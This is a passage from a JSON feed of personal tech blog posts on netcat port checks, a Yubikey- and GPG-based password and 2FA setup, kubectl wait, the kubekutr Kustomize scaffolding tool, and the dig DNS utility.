simple!\nFin!",[],{"slug":2284,"title":2285,"link":2286,"pubDate":2287,"contentSnippet":2288,"tags":2289,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"netcat-port","Use netcat for port scanning","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnetcat-port\u002F","2020-01-11T02:40:55.000Z","Quite often you’d need to check if a port on a target node is open or blocked by a firewall. I’ve always used telnet to test that, but it has a few drawbacks:\nNeed to use dirty hacks in shell scripts to auto-close the connection. Also, telnet outputs some errors to \u002Fdev\u002Fstdout instead of the standard \u002Fdev\u002Fstderr, which makes it harder to use in scripts.\nNon-standard implementation across different OSes. On Alpine Linux (mostly used in containers), if you install telnet using the busybox-extras package, the behaviour is different from what it is on standard Ubuntu\u002FArch environments. 
I’ve even faced weird issues on Alpine where telnet will simply wait endlessly for the connection to be established, while netcat showed no such issues.\nTelnet is actually a protocol, and the telnet client initiates a negotiation with the server before a connection is established.\nSo, after all these issues, I looked at other tools to eventually replace telnet with something better. I tried nmap, which is also a port scanner, but it is unreliable since a lot of hipster sysadmins drinking the security koolaid block port scanning tools like these. I wanted dependable tooling, and after a bit of Google-fu, I stumbled across netcat.\nnetcat is basically a swiss army knife to perform all kinds of ops with TCP\u002FUDP. You can create a file server, chat client\u002Fserver, TCP client etc. For this blog post we’re only interested in its port scanning abilities, so let’s see how to use it for that.\nNote: Install netcat-openbsd as it is a rewritten version of netcat-traditional with some more bells and whistles.\nThe basic syntax for port scanning looks like:\nnc -z host port\n-z tells nc to not send any data, just scan for any process listening on the target port. This is much better (and faster) than the telnet client initiating a connection with the upstream.\nTo make it more usable however, let’s pepper our command with some helpful flags:\nnc -vz -w 3 host port\n-v turns on verbose mode which outputs diagnostic messages. -w adds a timeout for the connection to be established. If you want to set a timeout in telnet there’s a hack for it.\nYou can even supply a range of ports to netcat like:\nnc -vz -w 3 host 8000-9000\nQuick Tip: You can also give an alias for the port instead of the number. For example:\n$ nc -vz -w 3 google.com https\nConnection to google.com 443 port [tcp\u002Fhttps] succeeded!\n\n$ nc -vz -w 3 google.com ssh\nnc: connect to google.com port 22 (tcp) timed out: Operation now in progress\nnc: connect to google.com port 22 (tcp) failed: Network is unreachable\nHope this post pretty much sums up the usage of netcat for port scanning! Read the man page for more info.\nFin!",[],{"slug":2291,"title":2292,"link":2293,"pubDate":2294,"contentSnippet":2295,"tags":2296,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"security-setup","My Setup: Passwords, 2FA, and Yubikeys","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F01\u002F04\u002Fsecurity-setup\u002F","2020-01-04T00:00:00.000Z","I upgraded my encryption setup recently, so I thought I should write about it,\njust in case it is helpful to someone else. As a security professional, I have a\ndifferent threat model from most folks, and as such my setup does involve a bit\nmore complexity than what I’d recommend to everyone. But if you are an at-risk\nindividual (journalist, person holding hundreds of bitcoins or other digital\nassets, activist) or if you are a linux user with a lot of free time - you might\nconsider duplicating some of this.\n\nI’ll discuss some of the other approaches I’ve considered, and my thought\nprocess around each choice I made. There are general recommendations at the\nbottom of the post.\nPasswords\nI used to be on LastPass till 2017[1], when I migrated to pass (“the\nstandard unix password manager”). With pass, each password lives inside a\ngpg-encrypted file whose filename is the title of the website or resource that\nrequires the password.\npass automatically manages a git repository for you, which I sync against\nGitLab. 
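Day to day, that sync is just pass's built-in git passthrough. A rough sketch (the entry name and remote URL here are hypothetical):

$ pass insert websites/example.com        # writes a new gpg-encrypted file and commits it
$ pass git remote add origin git@gitlab.com:user/password-store.git
$ pass git push -u origin master          # pushes only encrypted blobs to GitLab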
The one downside of using pass is that the list of my domains is\nvisible to my hosting provider. 2 In the past, I’ve set this up against\nKeybase Encrypted Git (Keybase doesn’t get to see even the file list), and my\nown git-server (only I get to see it).\nI don’t push it to GitHub, since most of my stuff lives on GitHub anyway, and I\ndidn’t want to add my passwords there as well. GitLab uptime is decent enough\nfor my usecase3. Finally, my GitLab account is fairly locked down with:\nzero integrations or third-party apps\nno active personal tokens\nsocial signin disabled\nonly yubikey SSH key configured\nMobile Passwords\nThere are 2 primary considerations I have:\nUsing pass involves GPG keys, and I can’t use hardware GPG keys on my\ncurrent device (iPhone SE).\nI don’t want to sync all my passwords to my phone. I have a limited number of\napplications on my device, and syncing all passwords doesn’t make sense.\nFor the first issue, I am forced to use a PGP key in software on\n[passforios][passforios]. If you are on Android, take a look at\n[OpenKeychain][okc], and Fidesmo\u002FYubikey NFC.\nFor the second issue, I use pass cp, and the .gpg-id file, which allows me\nto maintain a mobile-sync directory inside my pass git repository encrypted\nagainst a different key. From the pass documentation:\n~\u002F.password-store\u002F.gpg-id\nContains the default gpg key identification used for encryption and\ndecryption. Multiple gpg keys may be specified in this file, one per line. If\nthis file exists in any sub directories, passwords inside those sub\ndirectories are encrypted using those keys. This should be set using the init\ncommand.\nMy ~\u002F.password-store\u002Fmobile-sync\u002F.gpg-id file holds 2 keys: My main encryption\nkey, and the key I’ve configured on my phone.\nUnfortunately, I haven’t gotten it working well as a git submodule, so I have a\nhelper script that copies the encrypted password files from mobile-sync\nsubdirectory to a different repository (mobile-passwords.git). The script is\njust 2 lines:\n\ncp -r ~\u002F.password-store\u002Fmobile-sync\u002F*.gpg .\ngit-sync\n\n\nIt updates the git repository, and runs a sync to push any local changes to my\nmobile-passwords repository. I can pull that on my passforios application. I\ncould also clone the entire repo, but the iOS app doesn’t work nicely with a\nsingle-subdirectory approach.\nGPG\npass relies on GPG, and as such I require a strong key setup. I have the\nfollowing:\n2xYubikey 4 (Doesn’t have NFC)\nFidesmo Smartcard, currently unused\nBoth the Yubikeys are configured against my GPG Encryption key. I carry one of\nthe Yubikeys on my keyring with me. The backup Yubikey stays at my home.\nI followed this guide\nwhile configuring the same. As of now, switching between keys is not very\nuser-friendly, but future\nGnuPG versions plan to fix it. The Yubikey holds:\nAn encryption key\nA signing key\nAn authentication key\nI keep a copy of all these keys using\npaperkey as per the same guide.\nI have a subkey backup as well, since Yubikeys are known to fail4.\nSSH\nThe Authentication key in my Yubikey is configured for SSH. I just need to\nensure that my GPG agent is configured for SSH as well:\n\nexport GPG_TTY=\"$(tty)\"\nexport SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)\ngpgconf --launch gpg-agent\n\n\nU2F\nU2F lets me use a physical key as my second-factor on supported websites (as an\nalternative to SMS\u002FTOTP). 
I configure both of my Yubikeys for U2F wherever\npossible (Twitter\u002FAWS are notable exceptions and only support a single key). U2F\nsupport for [OpenSSH][ssh-u2f] is coming soon. So you can soon authenticate to\nyour server with the Yubikey+PIN, and finish the 2FA with U2F by tapping the\nkey5.\nRoot-of-Identity\nFor most people, the root of identity comes down to ownership of their email\naddress. As such, it is very often the juiciest target for most attackers. I run\nmy mail against Migadu, a privacy friendly swiss\nemail-hosting service. They provide me a management layer for managing my\ndomains which uses my GMail account. (See FAQ for why). I also have 2FA (TOTP\nonly) configured on the Migadu management setup.\nThe domain is currently registered at a Indian registrar (which doesn’t offer\nU2F, but I do have TOTP configured). I would have moved this to CloudFlare, but\nCloudFlare doesn’t support the .in TLD yet.6\nThe email address used for registring the domain again is my GMail. My DNS is\nconfigured on CloudFlare, which again uses my GMail and has appropriate 2FA\nconfigured. (It doesn’t support U2F). So here’s the list of critical providers:\nProvider\n      What can an attacker do\n      Auth\n      2FA\n    \nRegisrar\u002FMitsu\n      Change my nameserver, read any future email, reset passwords\n      GMail\u002FPassword\n      TOTP\n    \nDNS\u002FCloudFlare\n      Change my MX records, read any future emails, reset passwords\n      GMail\u002FPassword\n      TOTP\n    \nEmail\u002FMigadu\n      Reset my email password, read my current emails, reset passwords\n      GMail\u002FPassword\n      TOTP\n    \nGMail\n      Reset passwords for the above 3 accounts\n      Email\u002FPassword\n      U2F\n    \nAs you can see, I end up trusting GMail a lot here.\nRecovery\u002FBackup codes and Security Questions\nI use randomly generated UUIDs as answers to security questions. Currently, I’m\nstoring these for various services within the same password store. As it stands,\nI can’t get access to my password OR recovery token without my Yubikey and PIN.\nThe access Matrix looks like this:\nWhat\n      Physical Access\n      Additional Authentication\n    \nPassword\n      Yubikey\n      PIN\n    \nU2F-2FA\n      Yubikey\n      Physical touch\n    \nTOTP\n      Phone\n      TouchID\n    \nRecovery Code\n      Yubikey\n      PIN\n    \nSecurity Question answers\n      Yubikey\n      PIN\n    \nFailure Scenarios\nThere are lots of failure scenarios with such a setup, and while I’ve got a\npretty spotless record of not getting hacked - I’m not immune to screwups.\nHere’s all the bad things that can happen:\nYubikey failures\nIf my Yubikey fails (or if I forget its PIN), I can’t access passwords on my\ndevice. I still have access to commonly used passwords and my mail on my phone.\nMy backup Yubikey is kept safely at my home. If I lose both, I have the paperkey\nbackup at home (which I should store elsewhere).\nDevice failures\nI have a current version of the password repository against 3 PCs, and a partial\nversion in my mobile. If all these 4 devices fail at once, I can still clone a\nfresh version of the repository with my YubiKey (I would still have GitLab SSH\naccess). 
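For reference, bootstrapping GPG-over-SSH on a fresh machine is roughly the following (a sketch: it assumes enable-ssh-support is set in gpg-agent.conf and that the public key is importable; the repo path is hypothetical):

$ gpg --card-status          # with the Yubikey plugged in, creates local stubs for the card keys
$ export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)
$ gpgconf --launch gpg-agent
$ ssh-add -L                 # should print the authentication key living on the card
$ git clone git@gitlab.com:user/password-store.git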
I might need to prepare better for this though, since configuring\nGPG-SSH might not always be easy during an incident.\nAs a alternate scenario, my phone GPG key does have my GitLab password, so I can\nclone the repo over HTTPS (with password) if needed.\nCircular dependency against GitLab\nMy GitLab password is randomly generated and stored in the same password store\non GitLab. That is not too big of an issue, because I don’t need the GitLab\npassword anymore to clone my passwords repo, just my Yubikey (for SSH).\nLost Key\nIf I lose my key, the GPG card contains public info, including my email address,\nwhich can be used to contact me. I have a [Tile bluetooth tracker][tile] on my\nkeychain to make it easier for me to find it.\nMalware\nA hardware key doesn’t protect you from all attacks. At the end of the day, my\npasswords must be decrypted by the key and passed unencrypted back to my browser\n(or editor). pass for eg, doesn’t protect against memory scraping attacks. If\nI edit a password on an infected machine, it gets that password.\nIf my browser has a malicious extension, it already has keys to the kingdom. But\nif I then log into a website, it does get access to that password additionaly.\nxkcd 1200 famously illustrates this:\n\nA password vault protected by a hardware key protects against some attacks:\nA malicious extension can’t sniff my vault passphrase, since I don’t have one\nThe key can’t be exfiltrated from hardware.\nHowever, a malware can connect to my authenticated GPG socket, and start\ndecrypting things. To prevent against that, I run my Yubikey in “touch-only”\nmode, so it requires a “physical touch” before it actually does anything, even\nif the PIN is cached. Customizability is\ndependent on your Yubikey model.\nBut remember the xkcd warning - if I have a malware running on my device, it is\npretty much game over anyway. pass doesn’t prevent against memory scraping\nattacks, and actually uses \u002Fdev\u002Fshm to store the temporary plain-text files\ncontaining passwords. Ultimately, your identity is as secure as the device you\ntrust it with.\nImprovements\nIf you have any suggestions for any of the below, I’m\nhappy to hear them.\nTravel Plans\nSince my backup key stays at home, how do I deal with long-term travel? This is\nsomething I’m still figuring out. Do I take my backup Yubikey on my\nlonger-travels? Or should I setup a third-key before I do that? Chances of me\nlosing both the keys together are quite high, so I’m trying to avoid that.\nDomain Ownership\nI’d like to transfer my domain to\na registrar that supports U2F, likely\nNamecheap since I already own some domains there7. If you use CloudFlare,\nthey should roll out\nU2F support soon.\n2FA Recovery Guides\nI wish more organizations published what they consider as valid 2FA recovery\nmechanisms. GitHub supports 2FA recovery by proof of SSH keys or Personal\nTokens; Migadu just needs a few domain names from your account, and lots of\nservices require proof-of-identity.\nA lot of this is undocumented, and I wish organizations were more public about\nthis so users can take appropriate measures and understand their risk better.\nFidesmo Card\nI’m planning to configure my Fidesmo card against my existing GPG\u002FSSH key, so it\nstays in my wallet to improve redundancy. Unfortunately, it is not supported on\niOS, so I plan to get a NFC reader\u002Fwriter and test that out. 
This also helps\nwith travel plans a bit, since I’m less likely to lose my wallet\nanecdotally(which also has [a bluetooth tracker][slim]).\nU2F on iPhone\nU2F support on Mobile Safari is non-existent. Brave recently added support for\nthe upcoming Yubikey 5Ci, which supports both USB-C and lightning. However, this\nrequires a special Yubikey SDK, which breaks the idea of U2F being\ninteroperable. The 5Ci is also quite costly at $70. I don’t know of any\napplication that is actually supporting GPG-over-Yubikey-over-lightning.\nCompare this to Android where NFC based smartcards or Yubikeys just work. I’d\nlike that to happen with iPhones.\nFull Disk Encryption using a Yubikey\nIt is possible to configure\nFull Disk Encryption with Yubikeys,\nbut I haven’t tried it yet.\n2FA on my email account\nMigadu currently does not support 2FA on webmail access, just on\nmanage.migadu.com. This is very unfortunate, but I’m told this is planned soon\n(January 2020).\nRecovery\u002FBackup codes and Security Questions\nMy current setup of saving recovery codes alongside passwords isn’t optimal, but\nI don’t have a better way either. I’ve considered keeping my recovery codes on a\nalternate password store (such as bitwarden, or keypassX), but I’ll have to\nmemorize the password, and setup a separate 2FA for it to be truly\nfault-tolerant.\nFAQ\nWhy do you have stuff configured on your GMail? Aren’t you anti-Google?\nDespite all the flak that Google gets for privacy, their security team is pretty\nawesome. Your account is pretty much unhackable once you are enrolled into their\nAdvanced Protection Program. The few security-sensitive places where I use it\nare:\nDomain Registration\nEmail Management\nDNS Configuration\nEverywhere else, I use my actual domain (captnemo.in) to ensure nothing else\nroutes over GMail. Using GMail for the above 3 ensures that I don’t have a\ncircular dependency. If I were to lose my main email password, I can recover via\nmultiple ways:\nChange DNS to another email provider.\nReset password via migadu admin panel.\nEnsuring that either of these workflows do not rely on the same email account\nI’ve just lost access to is vital. Another alternative is to use a\ntrusted-friend (ideally someone more paranoid than me) as a proxy for these\nemails, and use their domain for managing these 2 services. Might get around to\nit someday.\nMy GMail recovery email is set to my main account, so it creates a circular\ndependency, but one that I actually want.\nWhat do you recommend I use?\nBitwarden for password management.\n2xHyperFIDO Mini U2F Keys configured for second\nfactor against as many accounts as possible.\nU2F is not only safer, but much more convenient than TOTP\u002FSMS based 2FA. For\niPhone\u002FUSB-C users, see\nthe Yubico website.\nIf you don’t like to pay the USB-C tax, there are cheap\nUSB-C to miniUSB\nadapters that can work with the HyperFIDO key and fit on your keychain. If you\naren’t convinced on why this is a good idea, see\nthis guide. The\nsecond key is just a backup key, and could be the primary key used by your\nspouse, friends or co-workers.\nA PIN configured on all your SIMs. Instructions for\niPhone,\nAndroid.\nFull-Disk-Encryption on all your devices. Instructions for\nWindows,\nMac,\nArchLinux,\nFedora,\nUbuntu.\nUse randomly generated passwords everywhere. Trust your password manager on\nthis.\nSetup a PIN on your WhatsApp.\nIf you own a lot of cryptocurrency, use a hardware wallet and put it in a bank\nsafe. Have a backup one, in another safe. 
You can put the PIN for those in\nyour password store. I haven’t researched enough to suggest you which\nwallet(s).\nGet a SIM without an Aadhaar, to make SIM-Jacking attackes harder (applies in\nIndia).\nGo through securityplanner.org, which gives\nyou personalized recommendations customized for our risk profile. I agree with\nmost of their recommendations8\nSignup for breach notifications against your email at\nhttps:\u002F\u002Fhaveibeenpwned.com\u002F.\nIf you’d like to get off GMail, pay for FastMail.\nAlternatively, if I know you in real-life, I’m happy to host your mail in my\nMigadu account. (Only works if you know me well enough to trust me)\nWhy are you so paranoid?\nI work in infosec. Breaking things comes naturally to me, and I plan for\ndefense-in-depth. Plus, I’d be a terrible security person if I got hacked.\nWhy not recommend open source keys instead?\nAvailability is a pain point, especially if you aren’t in the US. Even getting\nmy hands on a SoloKey was hard, despite backing it on KickStarter.\nOnlyKey also makes some claims regarding open source,\nbut I can’t find their schematics anywhere.\nSoloKey is great, and what I’d recommend, but\nit doesn’t support OpenPGP yet.\n[NitroKey Start][nitrokey-start] is\napparently completely FOSS,\nso you might wanna check that.\nThe HyperFIDO keys are compliant to the U2F\u002FFIDO standards, and I’ve not faced\nany issues while using them. They’re cheap and widely available. Unless you need\nGPG, go for it.\nThanks to Giridharan, Santosh, and Akshay for reviewing drafts of this\nand offering valuable suggesions. If you have any suggestions, happy to hear\nthem\n[passforios]:\n  https:\u002F\u002Fmssun.github.io\u002Fpassforios\u002F\n  “Open Source, no-network, minimalist pass client for iOS”\n[okc]: https:\u002F\u002Fwww.openkeychain.org\u002F\n[pass]: https:\u002F\u002Fpasswordstore.org\n[tile]: https:\u002F\u002Fwww.thetileapp.com\u002Fen-us\u002F\n[slim]:\n  https:\u002F\u002Fwww.thetileapp.com\u002Fen-us\u002Fstore\u002Ftiles\u002Fslim\n  “I have the older version of the Tile Slim”\n[ssh-u2f]:\n  https:\u002F\u002Fwww.undeadly.org\u002Fcgi?action=article;sid=20191115064850\n  “Does it really count as 2FA if both your SSH and U2F is the same device?”\n[nitrokey-start]: https:\u002F\u002Fshop.nitrokey.com\u002Fshop\u002Fproduct\u002Fnitrokey-start-6\nI moved away from Lastpass after Tavis Ormandy reported a RCE vulnerability\non their browser extension. Their wikipedia page mentions 2 breaches, and 3\nsecurity incidents. It has never undergone a security audit (unlike\nbitwarden) and is not something I recommend anymore. ↩\nThe pass-tomb extension bypasses\nthis limit and encrypts your filenames as well. ↩\nI have my own git server configured\nas a fallback if it goes down. I ensure the same controls on my Git server\nas Gitea, and it runs in my living room. ↩\nI lost my previous GPG key because my Yubikey stopped working ↩\nThe jury is still out on whether this counts as an “independent second\nfactor”. ↩\nThe domain is stuck in a legal limbo, because of an\nongoing case between my registrar and NIXI\n(which runs the .in registry). If you have any suggestions\u002Fideas, please\nreach out. ↩\nNamecheap announced\nU2F support\nin April 2019, and while it was buggy at first, it has definitely improved. ↩\nThe one major exception is lastpass, which I no longer recommend. 
↩",[],{"slug":2298,"title":2299,"link":2300,"pubDate":2301,"contentSnippet":2302,"tags":2303,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"kubectl-wait","kubectl wait","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fkubectl-wait\u002F","2020-01-01T02:40:55.000Z","For the longest time I’ve had these commands in my .gitlab-ci.yml file for a K8s CD pipeline:\n    ...\n    - kubectl apply -k overlays\u002Fprod\n    - echo "Waiting for 15 seconds for pods to be restarted" && sleep 15\n    - kubectl get po\n    ...\nSo, basically, I apply the changes to the cluster using kubectl apply and wait for an arbitrarily decided time (15 seconds) to see the pod status, hoping that by then the new deployments would be active and the old pods deleted. As the traditional SRE saying goes, “Hope is not a strategy”; this was clearly hacky and I knew it back then, I just didn’t prioritise finding a replacement. Recently I got to know about kubectl wait and woah, this is exactly what I needed. I can wait till either the condition is true or a timeout happens, whichever is earlier. This is so much better than the previous hack.\nkubectl wait --for=condition=available --timeout=60s --all deployments\nHere the condition depends on the resource you are selecting. You can see the values for Conditions using kubectl describe \u003Cresource>. For example, for deployments and pods:\n$ kc describe deployments\u002F{deployment_name} | grep Conditions -A 5\n\nConditions:\n  Type           Status  Reason\n  ----           ------  ------\n  Progressing    True    NewReplicaSetAvailable\n  Available      True    MinimumReplicasAvailable\n$ kc describe pods\u002F{pod_name} | grep Conditions -A 5\n\nConditions:\n  Type              Status\n  Initialized       True\n  Ready             True\n  ContainersReady   True\n  PodScheduled      True\nSo now you can set the value for the condition according to your needs. This will be pretty useful in CI\u002FCD pipelines. That’s pretty much it.\nUnrelated, but I’ve been thinking about doing more such short posts and being more consistent with my writing. If you liked the short and precise format or have any feedback on it, do reach out to me on Twitter.\nHappy New Year :)\nFin!",[],{"slug":2305,"title":2306,"link":2307,"pubDate":2308,"contentSnippet":2309,"tags":2310,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"introducing-kubekutr","Introducing kubekutr","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fintroducing-kubekutr\u002F","2019-12-30T02:40:55.000Z","kubekutr was born out of my frustration with organising K8s resource manifest files\u002Fdirectories. For the uninitiated, K8s lets you hold the state of your cluster declaratively as “manifest” files. K8s does so via a lot of asynchronous control loops that check whether the desired state matches the real-world state; in case of drift, it resets back to the user-desired state (I oversimplified this, but hope you get the drift ;)). These files are predominantly YAML, but there’s support for JSON as well. Anyway, creating these manifest files for a production-level project is quite a bit of manual labour. The API spec of every resource in Kubernetes is quite daunting and overwhelming. There are tools like Helm which abstract away the complexity of these YAMLs with their own templating system. There are quite a lot of these charts available for 3rd-party apps here. The idea is that you populate the Chart with just your own config “values” and you’ve a deployment ready in no time. 
Admittedly, this works quite well for something you want to take out for a quick spin, but personally I am not a fan of hiding away the complexity behind a magic layer. Also, the problem with Helm is that the “Chart” (and its templates) still has to be written by someone if you have a bespoke application. Helm is more geared towards common off-the-shelf apps like DBs, key-value stores, web proxies etc.\nI found kustomize a few months back and am quite happy with its approach towards managing manifests. The basic idea behind kustomize is that you create a base, and any kind of “customisations” must come as overlays. This is such a powerful technique compared to wrangling templates. A common approach is to name these overlays based on the environment. For example, a dev deployment can have replicas: 1 for a pod, but prod can apply a “patch” to update it with replicas: 3. This way of separating the two environments helps a lot when you follow the GitOps approach to deployment. All fine and good, until I realised I spent way too much time copy-pasting the bases for different projects and manually editing these files for each new project’s config.\nThen I did what any other programmer would do: spend some more time to automate :P And that is how kubekutr was born. (Quite an anticlimax, I know!)\nkubekutr is a really simple tool to bootstrap a Kustomize base. kubekutr reads a config file, templates out different resources and produces them as YAML files. Now, I know a lot of you reading this would be going “Another damn templating solution” in your mind, and while that reaction is warranted, given that we have 200+ tools in the community (everyone trying to solve similar problems in their own ways), I legit could not find a simple enough tool which would get the boring part of scaffolding a base out of my way and let me focus on what’s more important: the actual deployment. 
Hence I just decided to roll out my own solution which is the best one according to IKEA effect (just kidding).\nWorkflow#\nSo, let’s say you need to create a Nginx deployment, the kubekutr config.yml would look something like this:\ndeployments:\n  - name: nginx\n    replicas: 1\n    labels:\n      - name: 'service: nginx'\n    containers:\n      - name: nginx\n        image: 'nginx:latest'\n        portInt: 80\n        portName: nginx-port\nservices:\n  - name: nginx\n    type: ClusterIP\n    port: 80\n    targetPort: 80\n    labels:\n      - name: 'service: nginx'\n    selectors:\n      - name: 'service: nginx'\nTo create the base:\nkubekutr -c config.yml scaffold -o nginx-deployment\nnginx-deployment folder is initialised and you can view deployments\u002Fnginx.yml and service\u002Fnginx.yml which kubekutr created.\n$ tree nginx-deployment\n\n|-- base\n|   |-- deployments\n|   |   `-- nginx.yml\n|   |-- ingresses\n|   |-- services\n|   |   `-- nginx.yml\n|   `-- statefulsets\n$ cat base\u002Fdeployments\u002Fnginx.yml\n\napiVersion: apps\u002Fv1\nkind: Deployment\nmetadata:\n  name: nginx\n  labels:\n    service: nginx\nspec:\n  replicas: 1\n  selector:\n    matchLabels:\n      service: nginx\n  template:\n    metadata:\n      labels:\n        service: nginx\n    spec:\n      containers:\n        - name: nginx\n          image: nginx:latest\n          ports:\n          - containerPort: 80\n            name: nginx-port\n$ cat base\u002Fservices\u002Fnginx.yml\n\napiVersion: v1\nkind: Service\nmetadata:\n  name: nginx\n  labels:\n    service: nginx\nspec:\n  ports:\n    - port: 80\n      targetPort: 80\n      protocol: TCP\n  type: ClusterIP\n  selector:\n    service: nginx\nYou can now use the generated folder as a Kustomize base.\nNon Goals#\nkubekutr isn’t meant to replace the existing tools, it’s just a real simple cookie cutter approach to kustomize bases and that’s pretty much it. kustomize is native to Kubernetes and exposes the full API spec to end users. I feel that is much more better approach than templating solutions, the users must be exposed to the standard conventions rather than a random tool’s own config fields. The benefits are the same conventions can then be used across a wide variety of tools (like kubekutr) and users are in better control of the underlying resources. Adding a layer of magic also makes it harder to debug when shit goes down. Hence kubekutr chose kustomize to do all the heavy lifting of managing manifests.\nThere’s a lot of scope of improvements, but I wanted to just Ship It! and get some initial feedback. Let me know your thoughts on this :)\nFin!",[],{"slug":2312,"title":2313,"link":2314,"pubDate":2315,"contentSnippet":2316,"tags":2317,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"dig-overview","A quick primer on dig","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdig-overview\u002F","2019-11-11T05:27:55.000Z","Dig is a DNS lookup utility developed by BIND which helps a lot while troubleshooting DNS issues (which are more common than you probably think #hugops). I use dig fairly often and thought to write an introductory guide on how you can use dig with some practical examples that’ll help you dig through DNS issues faster (sorry for the lame pun, couldn’t resist.)\nBasics#\nThe most basic and common usage for dig is to query the authorative servers for a particular domain and retrieve the IP. If it’s an IPv4 then you should be looking at A record, while if it’s IPv6 then AAAA record is your friend. 
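For example, the record type is just an extra argument to dig (a quick sketch, output trimmed):

$ dig mrkaran.dev A +short       # IPv4 address
$ dig mrkaran.dev AAAA +short    # IPv6 address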
Let’s see the DNS records for the site you’re currently on:\n➜  ~ dig mrkaran.dev\n\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> mrkaran.dev\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: NOERROR, id: 23292\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 1220\n;; QUESTION SECTION:\n;mrkaran.dev.\t\t\tIN\tA\n\n;; ANSWER SECTION:\nmrkaran.dev.\t\t60\tIN\tA\t206.189.89.118\n\n;; Query time: 6 msec\n;; SERVER: 127.0.0.1#53(127.0.0.1)\n;; WHEN: Tue Oct 29 23:13:31 IST 2019\n;; MSG SIZE  rcvd: 67\n\nThis is the most basic example for dig. Let’s explore some of the additional options.\nKeep it short#\ndig +short keeps the information to bare minimum and only displays the ANSWER.\ndig +short mrkaran.dev\n206.189.89.118\nNameserver details#\nIf you want to find the Nameserver for your DNS records, you can use the query type ns.\n$ dig mrkaran.dev ns +short\nalec.ns.cloudflare.com.\ncruz.ns.cloudflare.com.\nns is one of the many query types you can use to indicate which type of DNS record you want to fetch. Default is A record which returns the IPv4 address of the domain (unless it’s a root domain, in which case the default query type is NS). Some other examples of query types are mx, AAAA, TXT etc.\nFun Fact: ANY query type has become obsolete as per the new RFC8482 and DNS operators can choose to not respond to this query. The reason for this is that the payload response size for an ANY query is quite huge (since it has to return all type of DNS records) and this could affect the performance of authoritative servers in case of a DNS amplification attack.\nUsing different DNS server#\nLet’s say you want to switch to a different resolver, you can use @ followed by the address of your DNS server.\n$ dig mrkaran.dev @9.9.9.9\nReverse DNS Lookup#\nThis one’s actually pretty cool. dig -x lets you query the IP and retrieve the hostname details for that IP.\ndig -x 206.189.89.118\nMultiple queries#\nYou can input a list of domain names and pass the file with the arg -f to dig.\n$ cat digfile\nmrkaran.dev\njoinmastodon.org\nzoho.com\nTo list down all MX records for the domains in a file, you can use something like:\n$ dig -f digfile +noall mx +answer\nmrkaran.dev.\t\t242\tIN\tMX\t10 mx.zoho.in.\nmrkaran.dev.\t\t242\tIN\tMX\t20 mx2.zoho.in.\nmrkaran.dev.\t\t242\tIN\tMX\t50 mx3.zoho.in.\njoinmastodon.org.\t21599\tIN\tMX\t10 in1-smtp.messagingengine.com.\njoinmastodon.org.\t21599\tIN\tMX\t20 in2-smtp.messagingengine.com.\nzoho.com.\t\t299\tIN\tMX\t10 smtpin.zoho.com.\nzoho.com.\t\t299\tIN\tMX\t20 smtpin2.zoho.com.\nzoho.com.\t\t299\tIN\tMX\t50 smtpin3.zoho.com.\nSearch List#\nI learnt this recently while debugging a DNS issue in one of the Kubernetes pods. Dig doesn’t use search paths by default, so if you have a service say redis inside a namespace dig won’t fetch any result:\n$ dig redis +short\n# empty output, indicates no record found\nThis is because a service name in Kubernetes is of the form service.namespace.svc.cluster.local. So, we should actually be querying for redis.myns.svc.cluster.local and we’ll get our result. 
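That is (a sketch, reusing the service IP that shows up with +search later in this post):

$ dig redis.myns.svc.cluster.local +short
10.100.32.73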
But isn’t that too long and painful (sorry for the pun) to type?\nSo, there’s another option +search which can be used to find all domains matching the search path defined in \u002Fetc\u002Fresolv.conf namesever configurations.\n$ cat \u002Fetc\u002Fresolv.conf\nnameserver 10.100.0.10\nsearch myns.svc.cluster.local svc.cluster.local cluster.local\nWe can now query for redis with this search list:\ndig redis +search +short\n10.100.32.73\nDNSSec Validation#\ndig even lets you validate the DNS records you received using DNSSEC validation.\n$ dig mrkaran.dev +dnssec\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> mrkaran.dev +dnssec\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: NOERROR, id: 36275\n;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags: do; udp: 1452\n;; QUESTION SECTION:\n;mrkaran.dev.\t\t\tIN\tA\n\n;; ANSWER SECTION:\nmrkaran.dev.\t\t20\tIN\tA\t178.128.17.49\nmrkaran.dev.\t\t20\tIN\tRRSIG\tA 13 2 20 20191112173050 20191110153050 34505 mrkaran.dev. Tl3zD6EqfVRvZi79ahePQcAXnbSUY9ZEYx\u002FKwXnDUyonlrCKuBHzIYYC MJoVns410+sOwbIrcAdLgx+eiMYqRQ==\n\n;; Query time: 65 msec\n;; SERVER: 1.1.1.1#53(1.1.1.1)\n;; WHEN: Mon Nov 11 22:01:01 IST 2019\n;; MSG SIZE  rcvd: 163\nThe important bit to note here is the ad flag set which represents Authenticated Data. The records will only be returned if the validation succeeds (unless you also specify +cd which indicates Checking Disabled flag.)\nOn a server which doesn’t have DNSSEC enabled, you can see no records are returned with the +dnssec flag.\n$ dig dnssec-failed.org +dnssec\n; \u003C\u003C>> DiG 9.10.6 \u003C\u003C>> dnssec-failed.org +dnssec\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER\u003C\u003C- opcode: QUERY, status: SERVFAIL, id: 19886\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, 